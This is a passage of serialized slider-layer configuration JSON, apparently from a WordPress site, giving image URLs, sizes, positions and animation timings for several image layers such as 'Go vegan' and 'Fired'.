v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Image 7\",\"alias\":\"Go vegan\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic2.png\",\"imageId\":2521},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"441px\"},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"357px\"},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"originalWidth\":502,\"originalHeight\":369,\"aspectRatio\":{\"d\":{\"v\":1.360433604336043433846725747571326792240142822265625},\"n\":{\"v\":1.360433604336043433846725747571326792240142822265625},\"t\":{\"v\":1.360433604336043433846725747571326792240142822265625},\"m\":{\"v\":1.360433604336043433846725747571326792240142822265625}}},\"position\":{\"x\":{\"d\":{\"v\":\"-11px\",\"e\":true},\"n\":{\"v\":\"-11px\"},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"15px\",\"e\":true},\"n\":{\"v\":\"15px\"},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":460},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":920,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"10\":{\"text\":\"Image 8\",\"alias\":\"Fired\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic7.png\",\"imageId\":1084},\"size\":{\"width\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"originalWidth\":165,\"originalHeight\":165,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"389px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-228px\",\"e\":true},\"n\":{\"v\":\"-186px\",\"e\":true},\"t\":{\"v\":\"-265px\",\"e\":true},\"m\":{\"v\":\"-187px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":780},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":400,\"start\":3020,\"startRelative\":740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"11\":{\"text\":\"Image 9\",\"alias\":\"Image 9\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic6.png\",\"imageId\":2522},\"size\":{\"width\":{\"d\":{\"v\":\"91px\",\"e\":true},\"n\":{\"v\":\"91px\",\"e\":true},\"t\":{\"v\":\"91px\"},\"m\":{\"v\":\"91px\"}},\"height\":{\"d\":{\"v\":\"83px\",\"e\":true},\"n\":{\"v\":\"83px\",\"e\":true},\"t\":{\"v\":\"83px\"},\"m\":{\"v\":\"83px\"}},\"originalWidth\":91,\"originalHeight\":83,\"aspectRatio\":{\"d\":{\"v\":1.0963855421686747870779754521208815276622772216796875},\"n\":{\"v\":1.0963855421686747870779754521208815276622772216796875},\"t\":{\"v\":1.0963855421686747870779754521208815276622772216796875},\"m\":{\"v\":1.0963855421686747870779754521208815276622772216796875}}},\"position\":{\"x\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"20px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"264px\",\"e\":true},\"n\":{\"v\":\"224px\",\"e\":true},\"t\":{\"v\":\"224px\"},\"m\":{\"v\":\"104px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1190,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1190,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"13\":{\"text\":\"Image 10\",\"alias\":\"\",\"uid\":13,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic2.png\",\"imageId\":2592},\"size\":{\"width\":{\"d\":{\"v\":\"174px\",\"e\":true},\"n\":{\"v\":\"97px\",\"e\":true},\"t\":{\"v\":\"97px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"145px\",\"e\":true},\"n\":{\"v\":\"81px\",\"e\":true},\"t\":{\"v\":\"81px\",\"e\":true},\"m\":{\"v\":\"79px\",\"e\":true}},\"originalWidth\":174,\"originalHeight\":145,\"aspectRatio\":{\"d\":{\"v\":1.1999999999999999555910790149937383830547332763671875},\"n\":{\"v\":1.1999999999999999555910790149937383830547332763671875},\"t\":{\"v\":1.1999999999999999555910790149937383830547332763671875},\"m\":{\"v\":1.1999999999999999555910790149937383830547332763671875}}},\"position\":{\"x\":{\"d\":{\"v\":\"1315px\",\"e\":true},\"n\":{\"v\":\"1002px\",\"e\":true},\"t\":{\"v\":\"390px\",\"e\":true},\"m\":{\"v\":\"175px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"847px\",\"e\":true},\"n\":{\"v\":\"676px\",\"e\":true},\"t\":{\"v\":\"793px\",\"e\":true},\"m\":{\"v\":\"143px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":280},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":\"150deg\",\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":280,\"startRelative\":280},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":280,\"startRelative\":280},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"14\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic1.png\",\"imageId\":2518},\"size\":{\"width\":{\"d\":{\"v\":\"324px\",\"e\":true},\"n\":{\"v\":\"223px\",\"e\":true},\"t\":{\"v\":\"223px\"},\"m\":{\"v\":\"155px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"203px\",\"e\":true},\"n\":{\"v\":\"140px\",\"e\":true},\"t\":{\"v\":\"140px\"},\"m\":{\"v\":\"97px\",\"e\":true}},\"originalWidth\":324,\"originalHeight\":203,\"aspectRatio\":{\"d\":{\"v\":1.5960591133004926600591488750069402158260345458984375},\"n\":{\"v\":1.5960591133004926600591488750069402158260345458984375},\"t\":{\"v\":1.5960591133004926600591488750069402158260345458984375},\"m\":{\"v\":1.5960591133004926600591488750069402158260345458984375}}},\"position\":{\"x\":{\"d\":{\"v\":\"730px\",\"e\":true},\"n\":{\"v\":\"484px\",\"e\":true},\"t\":{\"v\":\"226px\",\"e\":true},\"m\":{\"v\":\"144px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"456px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"380px\",\"e\":true},\"m\":{\"v\":\"225px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\